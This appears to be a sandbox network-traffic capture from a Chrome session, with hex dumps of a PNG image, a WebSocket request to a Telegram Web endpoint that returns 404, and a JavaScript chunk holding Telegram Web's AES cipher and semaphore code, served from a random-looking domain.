                                  2025-01-12 00:03:46 UTC468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 63 00 00 09 03 04 03 00 00 00 50 a0 9a ad 00 00 00 2a 50 4c 54 45 00 00 00 00 00 00 0d 0d 0d 12 12 12 15 15 15 12 12 12 0f 0f 0f 14 0d 0d 11 11 11 12 0d 0d 14 10 10 12 0e 0e 11 11 11 1a 1a 1a 62 a8 2b 60 00 00 00 0e 74 52 4e 53 00 05 13 0e 18 1d 22 27 2e 38 3f 46 4d 0a 93 22 99 9f 00 04 29 62 49 44 41 54 78 01 9c 5b 85 6f 23 c9 9b fd 6c 87 33 91 bc 0c 19 49 5e 26 f2 31 24 92 bc 4c 39 c9 c7 90 2c 13 65 25 2f 6f 34 3e c9 cb d4 2b 65 96 a3 f1 48 99 63 f0 49 c9 70 34 3d 52 26 31 b5 fb 45 f2 32 e5 fe 97 df 54 95 9f dc 6e 57 27 f6 be 65 37 15 bc 7a df fb be aa 95 48 cc af cb 59 14 17 e5 2c 06 90 16 85 e2 69 21 c4 d9 90 5d 30 5a 95 7e b1 07 68 fc b3 ed 55 0d 91 f1 ba 14 17 e3 ae c7 df 62 0e 36 55 9b 0a a2
                                  Data Ascii: PNGIHDRcP*PLTEb+`tRNS"'.8?FM")bIDATx[o#l3I^&1$L9,e%/o4>+eHcIp4=R&1E2TnW'e7zHY,i!]0Z~hUb6U
                                  2025-01-12 00:03:46 UTC1369INData Raw: fd 62 c4 9b 78 16 7e d2 3a 84 09 64 b6 3d 1c 15 2e 68 54 95 f6 c8 f4 aa 50 87 dc 42 87 4c 06 3e 7f 11 1a cd 62 3f 6b 27 72 76 63 f7 b8 f0 df 89 12 ac 38 86 bd d2 aa 88 53 36 d3 ac db 36 e9 37 45 2e c1 31 fd cb 66 6f b3 80 b4 e9 63 46 88 49 4f 84 8a 6f c3 dd 1f bc 12 2d a3 14 e3 10 fe 14 75 cb 33 53 e8 8f 32 53 24 f1 de b2 fe 7b c5 fc 47 4d 84 3d ee 19 33 eb d2 2f 06 7d 25 08 96 31 71 96 15 23 c6 e0 35 39 a8 a5 46 5a 69 8f ec d9 10 8e a4 b3 d2 21 72 f5 f6 72 72 fd 1c d7 59 af b8 d1 1a 43 7e 28 02 ff 49 31 b3 53 46 05 9f 49 43 fb 69 3d 6c 09 f7 90 0c b8 ba e5 bc b0 1b 06 20 a4 09 31 c8 61 e1 c2 e8 c4 3e 00 f5 a6 d8 c1 30 fd a7 4b 9f 88 c8 07 49 21 fe 0c ff 62 51 74 b7 af d8 97 70 c1 e0 a7 9f 1b ab 53 0d 19 99 7a c7 fc 8a f4 8b 38 44 46 c3 ca 4b b5 73 56 6e
                                  Data Ascii: bx~:d=.hTPBL>b?k'rvc8S667E.1focFIOo-u3S2S${GM=3/}%1q#59FZi!rrrYC~(I1SFICi=l 1a>0KI!bQtpSz8DFKsVn
                                  2025-01-12 00:03:46 UTC1369INData Raw: 16 85 70 80 43 5c 59 7d 82 82 c1 20 bd 33 65 74 5e 33 ea 37 65 14 19 d6 f9 a3 12 30 56 80 bc 6e ca 94 db a9 f6 5e 00 f5 36 2f 26 2b 3b 50 66 3e 92 32 65 11 18 ca a4 f4 8c 4c e1 14 b6 68 73 34 7e 65 66 a3 69 25 04 9d 6c 9e 5a c1 68 93 be 72 a1 88 4a d0 b4 1a 52 b2 42 d0 56 f5 31 7b 64 82 1b ea 0a 5f c0 26 4d 20 d7 bf fd 1d 2b 33 83 e1 eb 99 5f cb 73 d8 6f 46 62 08 4d 61 0b dd 82 29 d0 7a cf 8b c9 c1 09 14 e6 3d 72 b8 6f cc 99 56 24 76 a7 dc 58 4d ab 72 cc 5d 96 98 7b 86 91 a9 45 a2 08 fc 39 0a d6 c0 c4 82 de 08 80 4d 56 55 29 fb fd 04 26 56 d9 8a 41 95 49 94 e0 a5 85 5a 46 8f ce 48 72 30 44 49 5f e7 1a 9c 78 96 b4 45 be 49 93 32 54 85 40 6b 74 71 9e 1a 6b ab c1 dd 17 ce 1e 99 ca 8c 1b f6 fe b2 b3 97 19 fc 37 52 86 aa c4 d5 d6 1a 72 c6 4b 25 2e 66 9f d1 d0
                                  Data Ascii: pC\Y} 3et^37e0Vn^6/&+;Pf>2eLhs4~efi%lZhrJRBV1{d_&M +3_soFbMa)z=roV$vXMr]{E9MVU)&VAIZFHr0DI_xEI2T@ktqk7RrK%.f
                                  2025-01-12 00:03:46 UTC1369INData Raw: c0 4f 0a ec a1 27 86 94 56 c9 3f 75 6d 9c e1 dc 75 55 56 d5 2f 9c 5f fe b2 48 95 89 a3 a0 8d 57 71 51 ad ea 98 d3 f5 69 1e 83 b0 52 86 c1 79 ca e7 bc cd 99 74 65 10 fc a1 2b dd ff 9f 2f 53 12 8d 41 f5 c6 0b 97 de 12 99 f5 d3 c1 84 96 13 1b 88 57 89 0f 55 b8 b0 f4 94 2e 88 83 4b a8 a4 07 47 f4 8c 93 9e 5c d0 91 91 89 77 d1 76 73 f5 ed 96 99 30 81 25 2f b7 cb 32 8b 63 81 7e 06 2d 7f 2b bf be 04 34 32 94 27 a6 4c ce ca b5 25 e0 3f d3 1d 25 a8 b9 8a a6 cc e0 81 4f a3 77 ed 90 32 94 bf c0 c5 bf 8b 15 bf 86 0b 81 34 85 dc 28 64 cc 27 7d c5 d9 98 c5 1b 8a ce ca 76 ce e2 b0 a5 20 b3 2c a4 4c f8 38 25 ad 76 82 a5 89 8b b1 ca 71 fe 8d a0 60 dd 87 a3 9d 3c e5 f9 ee 99 8a 50 3d 81 2f d8 25 2e 85 56 b3 0c 75 42 de 5c 27 3d 9f 27 4d 90 60 58 e5 f8 07 a7 39 6c f1 79 17
                                  Data Ascii: O'V?umuUV/_HWqQiRyte+/SAWU.KG\wvs0%/2c~-+42'L%?%Ow24(d'}v ,L8%vq`<P=/%.VuB\'='M`X9ly
                                  2025-01-12 00:03:46 UTC1369INData Raw: 70 3d 8f f6 60 53 2d 9c e7 61 9b ab 68 f0 09 90 ca e2 17 49 d6 a8 f1 dd 0a b9 ca c3 08 63 23 ed e5 b7 a4 a4 3b f1 66 8c 66 55 b6 89 08 48 25 d7 aa e7 9c 0e e9 0a 3a 8a 75 64 d6 65 fc 48 85 3b 1a f2 7b 66 06 03 dc d2 09 4e 1e 7d fc 5a 51 83 03 dd 30 eb 2c 8d fb 3f 3e da fa 5d 5b d8 8e 37 13 58 8c aa b6 12 54 e0 a6 b2 72 aa 30 4a b4 ef e9 8e 98 83 8c 7e 22 3b 3a fa 33 78 d9 f2 cd 84 e9 b2 3c 01 60 8f 0a 5a 37 7a af 1d b4 8a ec 49 b8 13 90 cb fc 26 94 bb 46 86 44 46 b2 ca 27 5c 07 c8 df 3c 00 36 41 af d8 1d 16 1a 20 77 04 d6 d3 31 2d 96 3d b4 5b ee b9 ae b6 d2 34 99 30 db 45 8c e7 f9 5c 46 4e 10 96 33 6b bb e7 a5 c0 c9 ae 77 60 47 cc 7a 54 8e 9c c9 17 c2 46 ac fa e3 f3 04 c3 e7 d6 92 e6 a4 1c 39 5f 22 4d 32 50 9c 48 e3 a3 cc ab 05 f7 2f 2f 6a a3 a7 fc c8 83
                                  Data Ascii: p=`S-ahIc#;ffUH%:udeH;{fN}ZQ0,?>][7XTr0J~";:3x<`Z7zI&FDF'\<6A w1-=[40E\FN3kw`GzTF9_"M2PH//j
                                  2025-01-12 00:03:46 UTC1369INData Raw: 77 d3 79 1b b2 43 72 32 19 1a 03 ff 62 79 44 d0 d0 55 5b b7 e9 75 9e 5e f2 df c8 ef b3 25 3b cc e5 bd 58 bd 74 d1 63 84 57 68 c9 59 c2 cd 76 93 d9 ae 7e a2 25 77 90 03 ef 14 08 d5 52 88 cb ac 6e 06 26 81 60 12 fb de 1b 82 17 66 df 73 b7 b8 ff 4c ec 92 2c fc ec 12 86 19 2a e0 8e 0d b6 3e ab 44 8b 58 68 95 3d 2d 4e af b1 02 6f ec df 30 39 c9 2b 5c 02 e6 87 41 b3 07 fd fc 69 b9 e7 ce 32 bc a2 97 a0 30 00 8a 53 e4 bf dc 72 55 84 46 9d 66 42 87 02 59 eb a2 c7 bc d8 5d f4 73 ec 58 de 2d c6 e8 dc cd a6 a0 2c 17 08 d5 16 77 df a2 b2 6a d4 98 4a 58 b4 d8 ed b9 07 bc 8f e2 86 37 1c 1f fc c1 25 0b 33 54 08 0e f1 70 da 86 4c b7 56 4e d0 49 3f 7b 54 ac 9f 8d 33 3e 90 7d 21 25 c7 e8 59 a8 f8 8a 61 0c 82 2a 39 29 f5 dc 7f c7 78 34 92 36 a5 c1 b7 a6 ec e0 ef 6c 2c 05 47
                                  Data Ascii: wyCr2byDU[u^%;XtcWhYv~%wRn&`fsL,*>DXh=-No09+\Ai20SrUFfBY]sX-,wjJX7%3TpLVNI?{T3>}!%Ya*9)x46l,G
                                  2025-01-12 00:03:46 UTC1369INData Raw: e6 67 f3 31 1b aa f6 cb 80 16 5d 68 61 71 ba e4 eb 58 13 f9 77 f7 6f 9f 6d 98 17 d5 57 ea cf 5d 83 35 00 5a 78 fe b7 bf b8 db 99 59 d9 af c8 c8 6a 28 2d 8a 7f 56 d9 3f 64 73 95 15 c6 6e 5f aa 5c a2 7a 28 b6 fc e9 59 69 d8 90 97 11 59 81 e4 77 83 5c 89 b3 ad 75 66 c9 58 a8 39 bc ab ac f2 ff 14 5e 2d 81 fd 63 d8 13 6f ed bf 3a 4b 7f 62 0e 50 70 fb f9 98 57 e4 4c fa 73 51 8c 1c e9 7d e3 80 36 d1 c6 5f 5a 6f 77 9c a4 d9 7d 8b 6b 05 22 e2 b0 07 6d 78 fc 81 ef 5c b7 83 ec 62 d4 10 56 7f 26 56 1f 5d 3c 28 bd da ce 77 4b 88 6f 6a 43 a6 af 6f 42 bb 7e f1 04 42 25 84 c4 a8 b7 45 f4 b3 cf 0c 6a bf f6 33 4f db f0 78 61 b9 15 8c f2 c2 57 2a fb b1 17 e4 85 10 a0 66 4b 74 f4 c6 92 5a 10 4c d9 b5 0d 42 a4 d6 48 22 03 7a 70 aa b5 1e 10 cc d0 5f c5 8b ee a6 4d f0 6d 46 97
                                  Data Ascii: g1]haqXwomW]5ZxYj(-V?dsn_\z(YiYw\ufX9^-co:KbPpWLsQ}6_Zow}k"mx\bV&V]<(wKojCoB~B%Ej3OxaW*fKtZLBH"zp_MmF
                                  2025-01-12 00:03:46 UTC1369INData Raw: 94 49 d6 18 7a dd 10 28 72 cc 38 b5 16 ad 15 27 e7 76 56 9b c6 4f 23 c3 1a a6 45 e7 9f fe cd 49 9c 0e 28 e0 f0 69 aa c9 ba 7c 54 40 d4 08 59 9f 39 24 04 69 a1 fd e7 3b 5f ab 6c 04 6a c9 65 f6 80 73 f7 09 d3 c3 32 35 da 94 aa eb 17 bd fd 9c 19 e9 fc 38 2e 93 24 2d f5 06 d1 db be c6 18 5c c6 11 a1 d1 d6 2c 4c 4f 5f 3f bd b9 6e 92 db 5c 33 ec 49 29 51 ce f8 ca f0 cf 1a 50 ad 82 4d d0 5f 7e b7 a3 2f ea 02 7c b9 14 49 2e 33 83 50 82 c7 e9 9f 27 0f d9 0c 73 21 1a 11 1c 96 24 77 8f cb ea b6 0f 8d 2c 09 1d 82 d1 63 95 88 16 bd d4 7b 28 33 a7 ce 8a f9 34 6a 59 c7 51 ab 7b e0 b2 19 5b 5c 47 b4 6b da b4 8b 0a f9 fd 2a d5 a4 4d 63 9d 8a c8 dd b8 d9 b5 fd 7a c3 2e ba 3f 11 2f 02 2e 83 35 87 ac 15 10 61 c3 9f 34 4c e7 1b cf 4d bf 5e df 4d 8e 1d 2d 7a 96 26 bd a9 65 c2
                                  Data Ascii: Iz(r8'vVO#EI(i|T@Y9$i;_ljes258.$-\,LO_?n\3I)QPM_~/|I.3P's!$w,c{(34jYQ{[\Gk*Mcz.?/.5a4LM^M-z&e
                                  2025-01-12 00:03:46 UTC1369INData Raw: 14 ea 7f 8a e9 49 38 a5 11 da 62 1c d2 3c 25 52 fb f7 79 ea d4 78 90 30 bc 36 f8 44 82 3a 53 54 5a be 84 13 8a dc 58 78 14 a6 da 62 80 63 98 35 51 33 52 2b 2f 48 7c 44 40 b4 a6 6f d8 62 d2 51 36 eb dd 47 8e 1d 02 85 57 ef 77 27 08 e5 9f dc e1 13 e9 b5 03 b1 d0 1b e7 c4 8e 37 1d f5 61 87 70 f9 c8 eb 0f ff 7a ec e7 3d 08 6f f7 ba 7a 89 9b a1 d8 cf c0 67 a8 5d 8a 01 55 18 6a 6b 70 8b c3 51 48 c7 23 95 fd 28 ae 24 9c a3 26 8d c5 97 31 6e 67 94 57 d2 41 b1 a3 4c 8b 4a 0c 08 5c 5e c1 b9 2c 4f b9 86 0c b2 df 62 bb 72 28 c9 d5 86 07 8b 82 7e 66 78 97 7b b4 2f 9c 96 87 f2 d9 26 4a 7f 71 5b 18 62 3f 24 b1 f9 f9 8e 78 6d 98 e0 82 f9 41 36 31 80 70 9a 5d 76 51 e2 c4 12 ee 23 b2 4a 2a 30 77 a5 e1 c0 ba 8e 8f 74 f5 0b ff f9 43 16 b7 5d 59 0c c7 31 4d d5 24 31 72 d8 a6
                                  Data Ascii: I8b<%Ryx06D:STZXxbc5Q3R+/H|D@obQ6GWw'7apz=ozg]UjkpQH#($&1ngWALJ\^,Obr(~fx{/&Jq[b?$xmA61p]vQ#J*0wtC]Y1M$1r
                                  2025-01-12 00:03:46 UTC1369INData Raw: 79 dc c6 17 49 a2 22 88 6f 40 6a 63 e1 01 e1 a1 51 16 a7 2f d9 4f 28 86 52 82 f5 4c a4 28 44 60 ce bf 89 b6 09 19 a2 00 57 ff af e8 28 16 9a cc 9a 8a c2 25 48 13 61 3f 9a dc e0 83 27 a1 91 0c 97 e1 09 c2 73 8d bd 32 01 ea 0c 0a 91 43 5a df 06 a5 1a 81 83 e7 f9 ab d4 24 d3 d2 8b b8 62 b6 fe 6b f6 f0 77 c4 f1 72 a1 d3 3a b9 f6 32 ee a2 bc 54 14 1e c1 71 eb f3 05 23 15 c2 a2 8f cb e0 80 60 9f a3 b1 be 8e 05 b4 63 3d e8 47 dd e4 07 90 e0 6d 01 f3 9f 5d 70 1f ec 87 8f e6 7d 6a a1 ef 74 4b 01 8a a8 55 56 2f 8a 07 f6 b3 91 00 1c cc 9e a7 53 d8 7b b3 00 fa 93 e1 48 c0 c6 f2 1e 0d b5 48 2c 3a f7 1d 66 3e 9b 27 5a b8 b8 42 f2 93 cd f3 0e 51 8b 97 48 42 1d 34 78 98 d7 55 40 29 07 28 66 c7 44 ab df 1d b8 a4 68 03 11 2d dc 2f 73 9f c0 26 ba 3f e0 66 44 f8 c1 ea 3e 13
                                  Data Ascii: yI"o@jcQ/O(RL(D`W(%Ha?'s2CZ$bkwr:2Tq#`c=Gm]p}jtKUV/S{HH,:f>'ZBQHB4xU@)(fDh-/s&?fD>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.649820149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:46 UTC539OUTGET /apiws HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: Upgrade
                                  Pragma: no-cache
                                  Cache-Control: no-cache
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Upgrade: websocket
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-WebSocket-Version: 13
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Sec-WebSocket-Key: slccbJReovRGbPYhhvhUng==
                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                  Sec-WebSocket-Protocol: binary
                                  2025-01-12 00:03:47 UTC150INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:47 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  2025-01-12 00:03:47 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  33192.168.2.649830172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:47 UTC369OUTGET /5648.343cae73c4dc2e71af86.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:47 UTC929INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:47 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-11d9e"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6953
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6qsF%2B1Zy6l4quvn1jDf5UQCvav1mawIzOeIQzCbeQZo2WHR5v8ZwwVqQpQ3YHiPB0Gwzi4RyxY%2Fb%2BkssR3EBoYhF9%2BS8w2yX%2F8GMG9%2BJ6F1puI06nPsXO0MmDcQkEAL8sBGTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2ac2b0ec32b-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1485&rtt_var=579&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=947&delivery_rate=1855146&cwnd=224&unsent_bytes=0&cid=293bb7cabc7d6365&ts=142&x=0"
                                  2025-01-12 00:03:47 UTC440INData Raw: 37 63 64 35 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 35 36 34 38 2e 33 34 33 63 61 65 37 33 63 34 64 63 32 65 37 31 61 66 38 36 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 36 34 38 5d 2c 7b 37 36 39 32 3a 28 74 2c 65 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 65 29 2c 72 2e 64 28 65 2c 7b 43 54 52 3a 28 29 3d 3e 64 2c 49 47 45 3a 28 29 3d 3e 76 2c 64 65 66 61 75 6c 74 3a 28 29 3d 3e 77 7d 29 3b 76 61 72 20 6e 3d 6e 65 77 20 55 69
                                  Data Ascii: 7cd5/*! For license information please see 5648.343cae73c4dc2e71af86.js.LICENSE.txt */(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5648],{7692:(t,e,r)=>{"use strict";r.r(e),r.d(e,{CTR:()=>d,IGE:()=>v,default:()=>w});var n=new Ui
                                  2025-01-12 00:03:47 UTC1369INData Raw: 32 41 72 72 61 79 28 32 35 36 29 2c 6c 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 32 35 36 29 3b 66 75 6e 63 74 69 6f 6e 20 68 28 74 29 7b 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 33 32 41 72 72 61 79 29 72 65 74 75 72 6e 20 74 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 69 66 28 74 2e 6c 65 6e 67 74 68 25 34 21 3d 30 29 66 6f 72 28 76 61 72 20 65 3d 74 2e 6c 65 6e 67 74 68 25 34 3b 65 3c 3d 34 3b 65 2b 2b 29 74 2b 3d 22 5c 30 78 30 30 22 3b 76 61 72 20 72 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 74 2e 6c 65 6e 67 74 68 2f 34 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 74 2e 6c 65 6e 67 74 68 3b 65 2b 3d 34 29 72 5b 65 2f 34 5d 3d 28 6f 3d 65 2c 28 6e 3d 74 29 2e 63 68 61 72 43 6f 64 65 41 74 28 6f
                                  Data Ascii: 2Array(256),l=new Uint32Array(256);function h(t){if(t instanceof Uint32Array)return t;if("string"==typeof t){if(t.length%4!=0)for(var e=t.length%4;e<=4;e++)t+="\0x00";var r=new Uint32Array(t.length/4);for(e=0;e<t.length;e+=4)r[e/4]=(o=e,(n=t).charCodeAt(o
                                  2025-01-12 00:03:47 UTC1369INData Raw: 6e 67 74 68 3d 3d 34 29 26 26 28 72 3d 6e 5b 72 3e 3e 3e 32 34 5d 3c 3c 32 34 5e 6e 5b 72 3e 3e 31 36 26 32 35 35 5d 3c 3c 31 36 5e 6e 5b 72 3e 3e 38 26 32 35 35 5d 3c 3c 38 5e 6e 5b 32 35 35 26 72 5d 2c 69 25 65 2e 6c 65 6e 67 74 68 3d 3d 30 26 26 28 72 3d 72 3c 3c 38 5e 72 3e 3e 3e 32 34 5e 6f 3c 3c 32 34 2c 6f 3d 6f 3c 3c 31 5e 32 38 33 2a 28 6f 3e 3e 37 29 29 29 2c 74 68 69 73 2e 65 6e 63 4b 65 79 5b 69 5d 3d 74 68 69 73 2e 65 6e 63 4b 65 79 5b 69 2d 65 2e 6c 65 6e 67 74 68 5d 5e 72 3b 66 6f 72 28 76 61 72 20 75 3d 30 3b 69 3b 75 2b 2b 2c 69 2d 2d 29 72 3d 74 68 69 73 2e 65 6e 63 4b 65 79 5b 33 26 75 3f 69 3a 69 2d 34 5d 2c 74 68 69 73 2e 64 65 63 4b 65 79 5b 75 5d 3d 69 3c 3d 34 7c 7c 75 3c 34 3f 72 3a 66 5b 6e 5b 72 3e 3e 3e 32 34 5d 5d 5e 63 5b 6e
                                  Data Ascii: ngth==4)&&(r=n[r>>>24]<<24^n[r>>16&255]<<16^n[r>>8&255]<<8^n[255&r],i%e.length==0&&(r=r<<8^r>>>24^o<<24,o=o<<1^283*(o>>7))),this.encKey[i]=this.encKey[i-e.length]^r;for(var u=0;i;u++,i--)r=this.encKey[3&u?i:i-4],this.decKey[u]=i<=4||u<4?r:f[n[r>>>24]]^c[n
                                  2025-01-12 00:03:47 UTC1369INData Raw: 77 3d 30 3b 77 3c 34 3b 77 2b 2b 29 75 5b 33 26 2d 77 5d 3d 6f 5b 73 3e 3e 3e 32 34 5d 3c 3c 32 34 5e 6f 5b 61 3e 3e 31 36 26 32 35 35 5d 3c 3c 31 36 5e 6f 5b 79 3e 3e 38 26 32 35 35 5d 3c 3c 38 5e 6f 5b 32 35 35 26 67 5d 5e 74 68 69 73 2e 64 65 63 4b 65 79 5b 64 2b 2b 5d 2c 65 3d 73 2c 73 3d 61 2c 61 3d 79 2c 79 3d 67 2c 67 3d 65 3b 72 65 74 75 72 6e 20 75 7d 2c 74 7d 28 29 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 31 36 29 2c 74 68 69 73 2e 6b 65 79 3d 68 28 74 29 2c 74 68 69 73 2e 69 76 3d 68 28 65 29 2c 74 68 69 73 2e 63 69 70 68 65 72 3d 6e 65 77 20 67 28 74 29 2c 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 3d 72 2f 34 7d 72 65 74 75 72 6e 20 74 2e 70 72
                                  Data Ascii: w=0;w<4;w++)u[3&-w]=o[s>>>24]<<24^o[a>>16&255]<<16^o[y>>8&255]<<8^o[255&g]^this.decKey[d++],e=s,s=a,a=y,y=g,g=e;return u},t}(),v=function(){function t(t,e,r){void 0===r&&(r=16),this.key=h(t),this.iv=h(e),this.cipher=new g(t),this.blockSize=r/4}return t.pr
                                  2025-01-12 00:03:47 UTC1369INData Raw: 69 2b 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 29 7b 66 6f 72 28 76 61 72 20 75 3d 74 68 69 73 2e 63 69 70 68 65 72 2e 65 6e 63 72 79 70 74 28 74 68 69 73 2e 63 6f 75 6e 74 65 72 29 2c 73 3d 69 2c 61 3d 6f 3b 73 3c 72 2e 6c 65 6e 67 74 68 26 26 61 3c 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 3b 73 2b 2b 2c 61 2b 2b 29 6e 5b 73 5d 3d 75 5b 61 5d 5e 72 5b 73 5d 3b 72 2e 6c 65 6e 67 74 68 2d 69 3e 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 26 26 74 68 69 73 2e 69 6e 63 72 65 6d 65 6e 74 43 6f 75 6e 74 65 72 28 29 2c 6f 26 26 28 69 2d 3d 6f 2c 6f 3d 30 29 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 66 66 73 65 74 3d 28 74 68 69 73 2e 6f 66 66 73 65 74 2b 72 2e 6c 65 6e 67 74 68 25 34 29 25 34 2c 6e 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 63 72 79
                                  Data Ascii: i+=this.blockSize){for(var u=this.cipher.encrypt(this.counter),s=i,a=o;s<r.length&&a<this.blockSize;s++,a++)n[s]=u[a]^r[s];r.length-i>=this.blockSize&&this.incrementCounter(),o&&(i-=o,o=0)}return this.offset=(this.offset+r.length%4)%4,n},t.prototype.decry
                                  2025-01-12 00:03:47 UTC1369INData Raw: 65 3a 21 30 7d 29 3b 76 61 72 20 6e 3d 72 28 31 36 33 35 29 2c 6f 3d 72 28 34 35 38 36 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 6f 2e 45 5f 43 41 4e 43 45 4c 45 44 29 2c 74 68 69 73 2e 5f 76 61 6c 75 65 3d 74 2c 74 68 69 73 2e 5f 63 61 6e 63 65 6c 45 72 72 6f 72 3d 65 2c 74 68 69 73 2e 5f 71 75 65 75 65 3d 5b 5d 2c 74 68 69 73 2e 5f 77 65 69 67 68 74 65 64 57 61 69 74 65 72 73 3d 5b 5d 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 63 71 75 69 72 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 30 29 2c 74
                                  Data Ascii: e:!0});var n=r(1635),o=r(4586),i=function(){function t(t,e){void 0===e&&(e=o.E_CANCELED),this._value=t,this._cancelError=e,this._queue=[],this._weightedWaiters=[]}return t.prototype.acquire=function(t,e){var r=this;if(void 0===t&&(t=1),void 0===e&&(e=0),t
                                  2025-01-12 00:03:47 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 61 6c 75 65 3c 3d 30 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 56 61 6c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 61 6c 75 65 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 56 61 6c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 5f 76 61 6c 75 65 3d 74 2c 74 68 69 73 2e 5f 64 69 73 70 61 74 63 68 51 75 65 75 65 28 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6c 65 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 74 3c 3d 30 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 